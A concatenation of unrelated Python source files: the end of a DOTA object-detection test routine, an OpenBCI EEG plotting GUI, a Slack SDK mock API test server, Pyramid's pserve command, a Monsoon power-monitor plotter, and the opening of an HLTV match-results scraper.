in_graph=False)
cv2.imwrite(draw_path, final_detections)
else:
CLASS_DOTA = self.name_label_map.keys()
write_handle = {}
tools.makedirs(os.path.join(save_path, 'dota_res'))
for sub_class in CLASS_DOTA:
if sub_class == 'back_ground':
continue
write_handle[sub_class] = open(os.path.join(save_path, 'dota_res', 'Task1_%s.txt' % sub_class), 'a+')
for i, rbox in enumerate(res['boxes']):
command = '%s %.3f %.1f %.1f %.1f %.1f %.1f %.1f %.1f %.1f\n' % (res['image_id'].split('/')[-1].split('.')[0],
res['scores'][i],
rbox[0], rbox[1], rbox[2], rbox[3],
rbox[4], rbox[5], rbox[6], rbox[7],)
write_handle[self.label_name_map[res['labels'][i]]].write(command)
for sub_class in CLASS_DOTA:
if sub_class == 'back_ground':
continue
write_handle[sub_class].close()
fw = open(txt_name, 'a+')
fw.write('{}\n'.format(res['image_id'].split('/')[-1]))
fw.close()
pbar.set_description("Test image %s" % res['image_id'].split('/')[-1])
pbar.update(1)
for p in procs:
p.join()
def get_test_image(self):
txt_name = '{}.txt'.format(self.cfgs.VERSION)
if not self.args.show_box:
if not os.path.exists(txt_name):
fw = open(txt_name, 'w')
fw.close()
fr = open(txt_name, 'r')
img_filter = fr.readlines()
print('****************************' * 3)
print('Already tested imgs:', img_filter)
print('****************************' * 3)
fr.close()
test_imgname_list = [os.path.join(self.args.test_dir, img_name) for img_name in os.listdir(self.args.test_dir)
if img_name.endswith(('.jpg', '.png', '.jpeg', '.tif', '.tiff')) and
(img_name + '\n' not in img_filter)]
else:
test_imgname_list = [os.path.join(self.args.test_dir, img_name) for img_name in os.listdir(self.args.test_dir)
if img_name.endswith(('.jpg', '.png', '.jpeg', '.tif', '.tiff'))]
assert len(test_imgname_list) != 0, 'test_dir has no imgs there.' \
' Note that, we only support img format of (.jpg, .png, and .tiff) '
if self.args.num_imgs == np.inf:
real_test_img_list = test_imgname_list
else:
real_test_img_list = test_imgname_list[: self.args.num_imgs]
return real_test_img_list
|
Captura.py
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'Gui_bases.ui'
#
# Created by: PyQt5 UI code generator 5.13.0
#
# WARNING! All changes made in this file will be lost!
#########################################################
import sys
sys.path.append('C:/Python37/Lib/site-packages')
from IPython.display import clear_output
from pyqtgraph.Qt import QtGui, QtCore, QtWidgets
from PyQt5 import QtWidgets
import pyqtgraph as pg
import random
from pyOpenBCI import OpenBCICyton
import threading
import time
import numpy as np
from scipy import signal
##########################################################
from PyQt5 import QtCore, QtGui, QtWidgets
from pyqtgraph import PlotWidget, GraphicsLayoutWidget
pg.setConfigOption('background', 'w')
pg.setConfigOption('foreground', 'k')
data = [[0,0,0,0,0,0,0,0]]
SCALE_FACTOR = (4500000)/24/(2**23-1) #From the pyOpenBCI repo
colors = 'rgbycmwr'
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(1150, 699)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.graphicsView = GraphicsLayoutWidget(self.centralwidget)
self.graphicsView.setGeometry(QtCore.QRect(180, 10, 931, 651))
self.graphicsView.setObjectName("graphicsView")
self.ts_plots = [self.graphicsView.addPlot(row=i, col=0, colspan=2, title='Channel %d' % i, labels={'left': 'uV'}) for i in range(1,9)]
self.pushButton = QtWidgets.QPushButton(self.centralwidget)
self.pushButton.setGeometry(QtCore.QRect(10, 500, 131, 41))
self.pushButton.setObjectName("pushButton")
self.pushButton_2 = QtWidgets.QPushButton(self.centralwidget)
self.pushButton_2.setGeometry(QtCore.QRect(10, 390, 131, 41))
self.pushButton_2.setObjectName("pushButton_2")
self.pushButton_3 = QtWidgets.QPushButton(self.centralwidget)
self.pushButton_3.setGeometry(QtCore.QRect(10, 60, 141, 41))
self.pushButton_3.setObjectName("pushButton_3")
self.lcdNumber = QtWidgets.QLCDNumber(self.centralwidget)
self.lcdNumber.setGeometry(QtCore.QRect(20, 250, 111, 61))
self.lcdNumber.setSmallDecimalPoint(True)
self.lcdNumber.setDigitCount(3)
self.lcdNumber.setSegmentStyle(QtWidgets.QLCDNumber.Flat)
self.lcdNumber.setObjectName("lcdNumber")
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setGeometry(QtCore.QRect(100, 140, 61, 41))
self.label.setObjectName("label")
self.textEdit = QtWidgets.QTextEdit(self.centralwidget)
self.textEdit.setGeometry(QtCore.QRect(20, 140, 71, 41))
self.textEdit.setObjectName("textEdit")
MainWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.pushButton.setText(_translate("MainWindow", "SALIR"))
self.pushButton_2.setText(_translate("MainWindow", "INICIO"))
self.pushButton_3.setText(_translate("MainWindow", "ACTUALIZAR"))
self.label.setText(_translate("MainWindow", "SEGUNDOS."))
################################################################################
def save_data(self,sample):
global data
data.append([i*SCALE_FACTOR for i in sample.channels_data])
def updater(self):
global data, plots, colors
t_data = np.array(data[-1250:]).T #transpose data
fs = 250 #Hz
# Plot a time series of the raw data
for j in range(8):
self.ts_plots[j].clear()
# self.ts_plots[j].plot(t_data[j])
self.ts_plots[j].plot(pen=colors[j]).setData(t_data[j])
def start_board(): # Hilo configuracion cyton y lectura de datos
board = OpenBCICyton( "COM8",daisy=False) # LLamado de la clase OpenBCYCyton.
board.start_stream(ui.save_data) # Se llama el metodo de solicitud de datos.
if __name__ == "__main__":
if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'): ## verificar q python no se este corriendo en modo interactivo y tenga instalado pyqt5
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
x = threading.Thread(target=start_board)# crea Hilo asignando nombre start_board
x.daemon = True # declara este hilo como demonio(finaliza cuando hilo principal finalice)
x.start() # inicia Hilo
timer = QtCore.QTimer() # timer digital del pyqt5
timer.timeout.connect(ui.updater) # actualizacion grapica
timer.start(0) # pendiente...
sys.exit(app.exec_())
|
mock_web_api_server.py
|
import asyncio
import json
import logging
import re
import sys
import threading
import time
from http import HTTPStatus
from http.server import HTTPServer, SimpleHTTPRequestHandler
from multiprocessing.context import Process
from typing import Type
from unittest import TestCase
from urllib.parse import urlparse, parse_qs
from urllib.request import Request, urlopen
from tests.helpers import get_mock_server_mode
class MockHandler(SimpleHTTPRequestHandler):
protocol_version = "HTTP/1.1"
default_request_version = "HTTP/1.1"
logger = logging.getLogger(__name__)
pattern_for_language = re.compile("python/(\\S+)", re.IGNORECASE)
pattern_for_package_identifier = re.compile("slackclient/(\\S+)")
html_response_body = '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /api/team.info was not found on this server.</p>\n</body></html>\n'
error_html_response_body = '<!DOCTYPE html>\n<html lang="en">\n<head>\n\t<meta charset="utf-8">\n\t<title>Server Error | Slack</title>\n\t<meta name="author" content="Slack">\n\t<style></style>\n</head>\n<body>\n\t<nav class="top persistent">\n\t\t<a href="https://status.slack.com/" class="logo" data-qa="logo"></a>\n\t</nav>\n\t<div id="page">\n\t\t<div id="page_contents">\n\t\t\t<h1>\n\t\t\t\t<svg width="30px" height="27px" viewBox="0 0 60 54" class="warning_icon"><path d="" fill="#D94827"/></svg>\n\t\t\t\tServer Error\n\t\t\t</h1>\n\t\t\t<div class="card">\n\t\t\t\t<p>It seems like there’s a problem connecting to our servers, and we’re investigating the issue.</p>\n\t\t\t\t<p>Please <a href="https://status.slack.com/">check our Status page for updates</a>.</p>\n\t\t\t</div>\n\t\t</div>\n\t</div>\n\t<script type="text/javascript">\n\t\tif (window.desktop) {\n\t\t\tdocument.documentElement.className = \'desktop\';\n\t\t}\n\n\t\tvar FIVE_MINS = 5 * 60 * 1000;\n\t\tvar TEN_MINS = 10 * 60 * 1000;\n\n\t\tfunction randomBetween(min, max) {\n\t\t\treturn Math.floor(Math.random() * (max - (min + 1))) + min;\n\t\t}\n\n\t\twindow.setTimeout(function () {\n\t\t\twindow.location.reload(true);\n\t\t}, randomBetween(FIVE_MINS, TEN_MINS));\n\t</script>\n</body>\n</html>'
error_html_response_body = '<!DOCTYPE html>\n<html lang="en">\n<head>\n\t<meta charset="utf-8">\n\t<title>Server Error | Slack</title>\n\t<meta name="author" content="Slack">\n\t<style></style>\n</head>\n<body>\n\t<nav class="top persistent">\n\t\t<a href="https://status.slack.com/" class="logo" data-qa="logo"></a>\n\t</nav>\n\t<div id="page">\n\t\t<div id="page_contents">\n\t\t\t<h1>\n\t\t\t\t<svg width="30px" height="27px" viewBox="0 0 60 54" class="warning_icon"><path d="" fill="#D94827"/></svg>\n\t\t\t\tServer Error\n\t\t\t</h1>\n\t\t\t<div class="card">\n\t\t\t\t<p>It seems like there’s a problem connecting to our servers, and we’re investigating the issue.</p>\n\t\t\t\t<p>Please <a href="https://status.slack.com/">check our Status page for updates</a>.</p>\n\t\t\t</div>\n\t\t</div>\n\t</div>\n\t<script type="text/javascript">\n\t\tif (window.desktop) {\n\t\t\tdocument.documentElement.className = \'desktop\';\n\t\t}\n\n\t\tvar FIVE_MINS = 5 * 60 * 1000;\n\t\tvar TEN_MINS = 10 * 60 * 1000;\n\n\t\tfunction randomBetween(min, max) {\n\t\t\treturn Math.floor(Math.random() * (max - (min + 1))) + min;\n\t\t}\n\n\t\twindow.setTimeout(function () {\n\t\t\twindow.location.reload(true);\n\t\t}, randomBetween(FIVE_MINS, TEN_MINS));\n\t</script>\n</body>\n</html>'
def is_valid_user_agent(self):
user_agent = self.headers["User-Agent"]
return self.pattern_for_language.search(
user_agent
) and self.pattern_for_package_identifier.search(user_agent)
def is_valid_token(self):
if self.path.startswith("oauth"):
return True
return "Authorization" in self.headers and str(
self.headers["Authorization"]
).startswith("Bearer xoxb-")
def set_common_headers(self):
self.send_header("content-type", "application/json;charset=utf-8")
self.send_header("connection", "close")
self.end_headers()
invalid_auth = {
"ok": False,
"error": "invalid_auth",
}
not_found = {
"ok": False,
"error": "test_data_not_found",
}
def _handle(self):
try:
if self.path == "/received_requests.json":
self.send_response(200)
self.set_common_headers()
self.wfile.write(json.dumps(self.received_requests).encode("utf-8"))
return
if self.path in {"/oauth.access", "/oauth.v2.access"}:
self.send_response(200)
self.set_common_headers()
if self.headers["authorization"] == "Basic MTExLjIyMjpzZWNyZXQ=":
self.wfile.write("""{"ok":true}""".encode("utf-8"))
return
else:
self.wfile.write(
"""{"ok":false, "error":"invalid"}""".encode("utf-8")
)
return
if self.is_valid_token() and self.is_valid_user_agent():
parsed_path = urlparse(self.path)
len_header = self.headers.get("Content-Length") or 0
content_len = int(len_header)
post_body = self.rfile.read(content_len)
request_body = None
if post_body:
try:
post_body = post_body.decode("utf-8")
if post_body.startswith("{"):
request_body = json.loads(post_body)
else:
request_body = {
k: v[0] for k, v in parse_qs(post_body).items()
}
except UnicodeDecodeError:
pass
else:
if parsed_path and parsed_path.query:
request_body = {
k: v[0] for k, v in parse_qs(parsed_path.query).items()
}
header = self.headers["authorization"]
pattern = str(header).split("xoxb-", 1)[1]
if pattern.isnumeric():
self.send_response(int(pattern))
self.set_common_headers()
self.wfile.write("""{"ok":false}""".encode("utf-8"))
return
if pattern == "rate_limited":
self.send_response(429)
self.send_header("Retry-After", 1)
self.set_common_headers()
self.wfile.write(
"""{"ok":false,"error":"rate_limited"}""".encode("utf-8")
)
self.wfile.close()
return
if pattern == "timeout":
time.sleep(2)
self.send_response(200)
self.wfile.write("""{"ok":true}""".encode("utf-8"))
self.wfile.close()
return
if pattern == "html_response":
self.send_response(404)
self.send_header("content-type", "text/html;charset=utf-8")
self.send_header("connection", "close")
self.end_headers()
self.wfile.write(self.html_response_body.encode("utf-8"))
self.wfile.close()
return
if pattern == "error_html_response":
self.send_response(503)
# no charset here is intentional for testing
self.send_header("content-type", "text/html")
self.send_header("connection", "close")
self.end_headers()
self.wfile.write(self.error_html_response_body.encode("utf-8"))
self.wfile.close()
return
if pattern.startswith("user-agent"):
elements = pattern.split(" ")
prefix, suffix = elements[1], elements[-1]
ua: str = self.headers["User-Agent"]
if ua.startswith(prefix) and ua.endswith(suffix):
self.send_response(200)
self.set_common_headers()
self.wfile.write("""{"ok":true}""".encode("utf-8"))
self.wfile.close()
return
else:
self.send_response(400)
self.set_common_headers()
self.wfile.write(
"""{"ok":false, "error":"invalid_user_agent"}""".encode(
"utf-8"
)
)
self.wfile.close()
return
if request_body and "cursor" in request_body:
page = request_body["cursor"]
pattern = f"{pattern}_{page}"
if pattern == "coverage":
if self.path.startswith("/calls."):
for k, v in request_body.items():
if k == "users":
users = json.loads(v)
for u in users:
if "slack_id" not in u and "external_id" not in u:
raise Exception(f"User ({u}) is invalid value")
else:
ids = ["channels", "users", "channel_ids"]
if request_body:
for k, v in request_body.items():
if k in ids:
if not re.compile(r"^[^,\[\]]+?,[^,\[\]]+$").match(
v
):
raise Exception(
f"The parameter {k} is not a comma-separated string value: {v}"
)
body = {"ok": True, "method": parsed_path.path.replace("/", "")}
else:
with open(f"tests/data/web_response_{pattern}.json") as file:
body = json.load(file)
if self.path == "/api.test" and request_body:
body["args"] = request_body
else:
body = self.invalid_auth
if not body:
body = self.not_found
self.send_response(HTTPStatus.OK)
self.set_common_headers()
self.wfile.write(json.dumps(body).encode("utf-8"))
self.wfile.close()
except Exception as e:
self.logger.error(str(e), exc_info=True)
raise
def do_GET(self):
self._handle()
def do_POST(self):
self._handle()
class MockServerProcessTarget:
def __init__(self, handler: Type[SimpleHTTPRequestHandler] = MockHandler):
self.handler = handler
def run(self):
self.handler.received_requests = {}
self.server = HTTPServer(("localhost", 8888), self.handler)
try:
self.server.serve_forever(0.05)
finally:
self.server.server_close()
def stop(self):
self.handler.received_requests = {}
self.server.shutdown()
self.join()
class MonitorThread(threading.Thread):
def __init__(
self, test: TestCase, handler: Type[SimpleHTTPRequestHandler] = MockHandler
):
threading.Thread.__init__(self, daemon=True)
self.handler = handler
self.test = test
self.test.mock_received_requests = None
self.is_running = True
def run(self) -> None:
while self.is_running:
try:
req = Request(f"{self.test.server_url}/received_requests.json")
resp = urlopen(req, timeout=1)
self.test.mock_received_requests = json.loads(
resp.read().decode("utf-8")
)
except Exception as e:
# skip logging for the initial request
if self.test.mock_received_requests is not None:
logging.getLogger(__name__).exception(e)
time.sleep(0.01)
def stop(self):
self.is_running = False
self.join()
class MockServerThread(threading.Thread):
def __init__(
self, test: TestCase, handler: Type[SimpleHTTPRequestHandler] = MockHandler
):
threading.Thread.__init__(self)
self.handler = handler
self.test = test
def run(self):
self.server = HTTPServer(("localhost", 8888), self.handler)
self.test.server_url = "http://localhost:8888"
self.test.host, self.test.port = self.server.socket.getsockname()
self.test.server_started.set() # threading.Event()
self.test = None
try:
self.server.serve_forever()
finally:
self.server.server_close()
def stop(self):
self.server.shutdown()
self.join()
def setup_mock_web_api_server(test: TestCase):
if get_mock_server_mode() == "threading":
test.server_started = threading.Event()
test.thread = MockServerThread(test)
test.thread.start()
test.server_started.wait()
else:
# start a mock server as another process
target = MockServerProcessTarget()
test.server_url = "http://localhost:8888"
test.host, test.port = "localhost", 8888
test.process = Process(target=target.run, daemon=True)
test.process.start()
time.sleep(0.1)
# start a thread in the current process
# this thread fetches mock_received_requests from the remote process
test.monitor_thread = MonitorThread(test)
test.monitor_thread.start()
count = 0
# wait until the first successful data retrieval
while test.mock_received_requests is None:
time.sleep(0.01)
count += 1
if count >= 100:
raise Exception("The mock server is not yet running!")
def cleanup_mock_web_api_server(test: TestCase):
if get_mock_server_mode() == "threading":
test.thread.stop()
test.thread = None
else:
# stop the thread to fetch mock_received_requests from the remote process
test.monitor_thread.stop()
retry_count = 0
# terminate the process
while test.process.is_alive():
test.process.terminate()
time.sleep(0.01)
retry_count += 1
if retry_count >= 100:
raise Exception("Failed to stop the mock server!")
# Python 3.6 does not have this method
if sys.version_info.major == 3 and sys.version_info.minor > 6:
# cleanup the process's resources
test.process.close()
test.process = None
def assert_auth_test_count(test: TestCase, expected_count: int):
time.sleep(0.1)
retry_count = 0
error = None
while retry_count < 3:
try:
test.mock_received_requests["/auth.test"] == expected_count
break
except Exception as e:
error = e
retry_count += 1
# waiting for mock_received_requests updates
time.sleep(0.1)
if error is not None:
raise error
async def assert_auth_test_count_async(test: TestCase, expected_count: int):
await asyncio.sleep(0.1)
retry_count = 0
error = None
while retry_count < 3:
try:
test.mock_received_requests["/auth.test"] == expected_count
break
except Exception as e:
error = e
retry_count += 1
# waiting for mock_received_requests updates
await asyncio.sleep(0.1)
if error is not None:
raise error
|
pserve.py
|
# (c) 2005 Ian Bicking and contributors; written for Paste
# (http://pythonpaste.org) Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license.php
#
# For discussion of daemonizing:
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/278731
#
# Code taken also from QP: http://www.mems-exchange.org/software/qp/ From
# lib/site.py
import argparse
import os
import re
import sys
import textwrap
import threading
import time
import webbrowser
import hupper
from pyramid.compat import PY2
from pyramid.scripts.common import get_config_loader
from pyramid.scripts.common import parse_vars
from pyramid.path import AssetResolver
from pyramid.settings import aslist
def main(argv=sys.argv, quiet=False):
command = PServeCommand(argv, quiet=quiet)
return command.run()
class PServeCommand(object):
description = """\
This command serves a web application that uses a PasteDeploy
configuration file for the server and application.
You can also include variable assignments like 'http_port=8080'
and then use %(http_port)s in your config files.
"""
default_verbosity = 1
parser = argparse.ArgumentParser(
description=textwrap.dedent(description),
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument(
'-n', '--app-name',
dest='app_name',
metavar='NAME',
help="Load the named application (default main)")
parser.add_argument(
'-s', '--server',
dest='server',
metavar='SERVER_TYPE',
help="Use the named server.")
parser.add_argument(
'--server-name',
dest='server_name',
metavar='SECTION_NAME',
help=("Use the named server as defined in the configuration file "
"(default: main)"))
parser.add_argument(
'--reload',
dest='reload',
action='store_true',
help="Use auto-restart file monitor")
parser.add_argument(
'--reload-interval',
dest='reload_interval',
default=1,
help=("Seconds between checking files (low number can cause "
"significant CPU usage)"))
parser.add_argument(
'-b', '--browser',
dest='browser',
action='store_true',
help=("Open a web browser to the server url. The server url is "
"determined from the 'open_url' setting in the 'pserve' "
"section of the configuration file."))
parser.add_argument(
'-v', '--verbose',
default=default_verbosity,
dest='verbose',
action='count',
help="Set verbose level (default " + str(default_verbosity) + ")")
parser.add_argument(
'-q', '--quiet',
action='store_const',
const=0,
dest='verbose',
help="Suppress verbose output")
parser.add_argument(
'config_uri',
nargs='?',
default=None,
help='The URI to the configuration file.',
)
parser.add_argument(
'config_vars',
nargs='*',
default=(),
help="Variables required by the config file. For example, "
"`http_port=%%(http_port)s` would expect `http_port=8080` to be "
"passed here.",
)
_get_config_loader = staticmethod(get_config_loader) # for testing
open_url = None
_scheme_re = re.compile(r'^[a-z][a-z]+:', re.I)
def __init__(self, argv, quiet=False):
self.args = self.parser.parse_args(argv[1:])
if quiet:
self.args.verbose = 0
if self.args.reload:
self.worker_kwargs = {'argv': argv, "quiet": quiet}
self.watch_files = set()
def out(self, msg): # pragma: no cover
if self.args.verbose > 0:
print(msg)
def get_config_path(self, loader):
return os.path.abspath(loader.uri.path)
def pserve_file_config(self, loader, global_conf=None):
settings = loader.get_settings('pserve', global_conf)
config_path = self.get_config_path(loader)
here = os.path.dirname(config_path)
watch_files = aslist(settings.get('watch_files', ''), flatten=False)
# track file paths relative to the ini file
resolver = AssetResolver(package=None)
for file in watch_files:
if ':' in file:
file = resolver.resolve(file).abspath()
elif not os.path.isabs(file):
file = os.path.join(here, file)
self.watch_files.add(os.path.abspath(file))
# attempt to determine the url of the server
open_url = settings.get('open_url')
if open_url:
self.open_url = open_url
def guess_server_url(self, loader, server_name, global_conf=None):
server_name = server_name or 'main'
settings = loader.get_settings('server:' + server_name, global_conf)
if 'port' in settings:
return 'http://127.0.0.1:{port}'.format(**settings)
def run(self): # pragma: no cover
if not self.args.config_uri:
self.out('You must give a config file')
return 2
config_uri = self.args.config_uri
config_vars = parse_vars(self.args.config_vars)
app_spec = self.args.config_uri
app_name = self.args.app_name
loader = self._get_config_loader(config_uri)
loader.setup_logging(config_vars)
self.pserve_file_config(loader, global_conf=config_vars)
server_name = self.args.server_name
if self.args.server:
server_spec = 'egg:pyramid'
assert server_name is None
server_name = self.args.server
else:
server_spec = app_spec
server_loader = loader
if server_spec != app_spec:
server_loader = self.get_config_loader(server_spec)
# do not open the browser on each reload so check hupper first
if self.args.browser and not hupper.is_active():
url = self.open_url
if not url:
url = self.guess_server_url(
server_loader, server_name, config_vars)
if not url:
self.out('WARNING: could not determine the server\'s url to '
'open the browser. To fix this set the "open_url" '
'setting in the [pserve] section of the '
'configuration file.')
else:
def open_browser():
time.sleep(1)
webbrowser.open(url)
t = threading.Thread(target=open_browser)
t.setDaemon(True)
t.start()
if self.args.reload and not hupper.is_active():
if self.args.verbose > 1:
self.out('Running reloading file monitor')
hupper.start_reloader(
'pyramid.scripts.pserve.main',
reload_interval=int(self.args.reload_interval),
verbose=self.args.verbose,
worker_kwargs=self.worker_kwargs
)
return 0
config_path = self.get_config_path(loader)
self.watch_files.add(config_path)
server_path = self.get_config_path(server_loader)
self.watch_files.add(server_path)
if hupper.is_active():
reloader = hupper.get_reloader()
reloader.watch_files(list(self.watch_files))
server = server_loader.get_wsgi_server(server_name, config_vars)
app = loader.get_wsgi_app(app_name, config_vars)
if self.args.verbose > 0:
if hasattr(os, 'getpid'):
msg = 'Starting server in PID %i.' % os.getpid()
else:
msg = 'Starting server.'
self.out(msg)
try:
server(app)
except (SystemExit, KeyboardInterrupt) as e:
if self.args.verbose > 1:
raise
if str(e):
msg = ' ' + str(e)
else:
msg = ''
self.out('Exiting%s (-v to see traceback)' % msg)
# For paste.deploy server instantiation (egg:pyramid#wsgiref)
def wsgiref_server_runner(wsgi_app, global_conf, **kw): # pragma: no cover
from wsgiref.simple_server import make_server
host = kw.get('host', '0.0.0.0')
port = int(kw.get('port', 8080))
server = make_server(host, port, wsgi_app)
print('Starting HTTP server on http://%s:%s' % (host, port))
server.serve_forever()
# For paste.deploy server instantiation (egg:pyramid#cherrypy)
def cherrypy_server_runner(
app, global_conf=None, host='127.0.0.1', port=None,
ssl_pem=None, protocol_version=None, numthreads=None,
server_name=None, max=None, request_queue_size=None,
timeout=None
): # pragma: no cover
"""
Entry point for CherryPy's WSGI server
Serves the specified WSGI app via CherryPyWSGIServer.
``app``
The WSGI 'application callable'; multiple WSGI applications
may be passed as (script_name, callable) pairs.
``host``
This is the ipaddress to bind to (or a hostname if your
nameserver is properly configured). This defaults to
127.0.0.1, which is not a public interface.
``port``
The port to run on, defaults to 8080 for HTTP, or 4443 for
HTTPS. This can be a string or an integer value.
``ssl_pem``
This an optional SSL certificate file (via OpenSSL) You can
generate a self-signed test PEM certificate file as follows:
$ openssl genrsa 1024 > host.key
$ chmod 400 host.key
$ openssl req -new -x509 -nodes -sha1 -days 365 \\
-key host.key > host.cert
$ cat host.cert host.key > host.pem
$ chmod 400 host.pem
``protocol_version``
The protocol used by the server, by default ``HTTP/1.1``.
``numthreads``
The number of worker threads to create.
``server_name``
The string to set for WSGI's SERVER_NAME environ entry.
``max``
The maximum number of queued requests. (defaults to -1 = no
limit).
``request_queue_size``
The 'backlog' argument to socket.listen(); specifies the
maximum number of queued connections.
``timeout``
The timeout in seconds for accepted connections.
"""
is_ssl = False
if ssl_pem:
port = port or 4443
is_ssl = True
if not port:
if ':' in host:
host, port = host.split(':', 1)
else:
port = 8080
bind_addr = (host, int(port))
kwargs = {}
for var_name in ('numthreads', 'max', 'request_queue_size', 'timeout'):
var = locals()[var_name]
if var is not None:
kwargs[var_name] = int(var)
from cherrypy import wsgiserver
server = wsgiserver.CherryPyWSGIServer(bind_addr, app,
server_name=server_name, **kwargs)
if ssl_pem is not None:
if PY2:
server.ssl_certificate = server.ssl_private_key = ssl_pem
else:
# creates wsgiserver.ssl_builtin as side-effect
wsgiserver.get_ssl_adapter_class()
server.ssl_adapter = wsgiserver.ssl_builtin.BuiltinSSLAdapter(
ssl_pem, ssl_pem)
if protocol_version:
server.protocol = protocol_version
try:
protocol = is_ssl and 'https' or 'http'
if host == '0.0.0.0':
print('serving on 0.0.0.0:%s view at %s://127.0.0.1:%s' %
(port, protocol, port))
else:
print('serving on %s://%s:%s' % (protocol, host, port))
server.start()
except (KeyboardInterrupt, SystemExit):
server.stop()
return server
if __name__ == '__main__': # pragma: no cover
sys.exit(main() or 0)
|
plot_realtime_power.py
|
#!/usr/bin/env python
import Monsoon.LVPM as LVPM
import Monsoon.HVPM as HVPM
from Monsoon import sampleEngine
import argparse
import csv
import os
import matplotlib
matplotlib.use('TKAgg')
from matplotlib import pyplot as plt
import matplotlib.animation as animation
import threading
import collections
import signal
import sys
fig, ax = plt.subplots()
plt.ylabel('amperage (mA)')
plt.xlabel('time sequences')
plt.ylim((0, 2000))
display_range = 50000
samples_queue = collections.deque(maxlen=display_range)
time_queue = collections.deque(maxlen=display_range)
time_queue.extend([0 for _ in range(display_range)])
samples_queue.extend([0 for _ in range(display_range)])
line, = ax.plot(time_queue, samples_queue, linewidth=0.5)
should_pause = False
csv_file_handle = None
csv_writer = None
trigger_count = 0
trigger = float("inf")
triggered = False
header = ["Time(ms)", "Main(mA)", "Main Voltage(V)"]
def animate(_):
if should_pause:
return line,
# print("samples: {}".format(latest_current_values))
line.set_xdata(time_queue)
line.set_ydata(samples_queue) # update the data
ax.relim()
for label in ax.xaxis.get_ticklabels()[::100]:
label.set_visible(False)
ax.autoscale_view(True, True, True)
return line,
def sample_generator(sampler, sample_number_):
sampler.startSampling(sample_number_, output_callback=samples_callback)
def samples_callback(samples_):
last_values = samples_[sampleEngine.channels.MainCurrent]
if last_values:
# filter negative values
valid_values = [max(v, 0) for v in last_values]
time_queue.extend(samples_[sampleEngine.channels.timeStamp])
samples_queue.extend(valid_values)
avg = sum(valid_values) / len(valid_values)
if avg > trigger:
global triggered
triggered = True
if triggered:
records = list(zip(samples_[sampleEngine.channels.timeStamp],
samples_[sampleEngine.channels.MainCurrent],
samples_[2]))
global csv_file_handle, csv_writer
if not csv_writer:
csv_writer = csv.writer(csv_file_handle)
csv_writer.writerow(header)
csv_writer.writerows(records)
def on_click(_event):
global should_pause
if _event.dblclick:
should_pause ^= True
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-n", "--number_of_samples", type=int, default=-1,
help="number of power samples per second, default to -1 meaning sample infinitely")
parser.add_argument("-m", "--monsoon_model", choices=("lvpm", "hvpm", "l", "h", "black", "white", "b", "w"),
default="w",
help="Monsoon type, either white(w,l,lvpm) or black(b,h,hvpm)")
parser.add_argument("-s", "--save_file", type=str, default=None, # 'data/power_samples.csv',
help="file to save power samples")
parser.add_argument("-t", "--trigger", type=float, default=float("inf"),
help="threshold to trigger sampling, unit is mA")
args = parser.parse_args()
sample_number = args.number_of_samples if args.number_of_samples > 0 else sampleEngine.triggers.SAMPLECOUNT_INFINITE
monsoon_model = args.monsoon_model
if monsoon_model.startswith('l') or monsoon_model.startswith('w'):
monsoon = LVPM.Monsoon() # white
else:
monsoon = HVPM.Monsoon()
monsoon.setup_usb()
print("Monsoon Power Monitor Serial number: {}".format(monsoon.getSerialNumber()))
engine = sampleEngine.SampleEngine(monsoon)
trigger = args.trigger
if args.save_file:
dir_name = os.path.dirname(args.save_file)
if not os.path.exists(dir_name):
os.makedirs(dir_name)
if trigger < float("inf"): # set trigger
engine.disableCSVOutput()
# global csv_name
csv_file = args.save_file
csv_file_handle = open(csv_file, 'w')
else:
engine.enableCSVOutput(args.save_file)
else:
engine.disableCSVOutput()
engine.ConsoleOutput(True)
def signal_handler(_signal, _frame):
print('You pressed Ctrl+C, clearing monsoon sampling and exit!')
monsoon.stopSampling()
csv_file_handle.close()
sys.exit(0)
def handle_close(_event):
print('You cosed figure, clearing monsoon sampling and exit!')
monsoon.stopSampling()
csv_file_handle.close()
sys.exit(0)
fig.canvas.mpl_connect('close_event', handle_close)
fig.canvas.mpl_connect('button_press_event', on_click)
signal.signal(signal.SIGINT, signal_handler)
pt = threading.Thread(target=sample_generator, name='sample_generator', args=(engine, sample_number))
pt.daemon = True
pt.start()
ani = animation.FuncAnimation(fig, animate, interval=100)
plt.show()
|
parcer_new_train.py
|
from bs4 import BeautifulSoup
import requests
import re
import numpy as np
import json
import csv
from threading import Thread
counter_last_matches = 10
def parse(url):
matches_links = []
page = requests.get(url)
# Success - 200
if page.status_code != 200:
exit(-1)
soup = BeautifulSoup(page.text, "html.parser")
# print(soup)
new = []
for i in soup.findAll('a', class_='a-reset'):
new.append(i.get('href'))
for i in new:
if re.search(r'\bmatches\b', i):
matches_links.append(i)
del new
return matches_links
def parse_links():
# Первая страница
matches_links = parse('https://www.hltv.org/results')
with open('data/matches_links_0.json', 'w') as file:
json.dump(matches_links, file)
# Остальные страницы
for i in range(1, 5): # max - 4930
# print(i)
matches_links = parse(f'https://www.hltv.org/results?offset={i * 100}')
with open(f'data/matches_links_{i}.json', 'w') as file:
json.dump(matches_links, file)
# Optimized
# Get players from team
# BAD!!!
def get_players(url):
page = requests.get(url)
tmp1 = BeautifulSoup(page.text, "html.parser").findAll('div', class_='team1-gradient')[0].findAll('a')[0].get(
'href')
tmp2 = BeautifulSoup(page.text, "html.parser").findAll('div', class_='team2-gradient')[0].findAll('a')[0].get(
'href')
s1 = f'https://www.hltv.org{tmp1}'
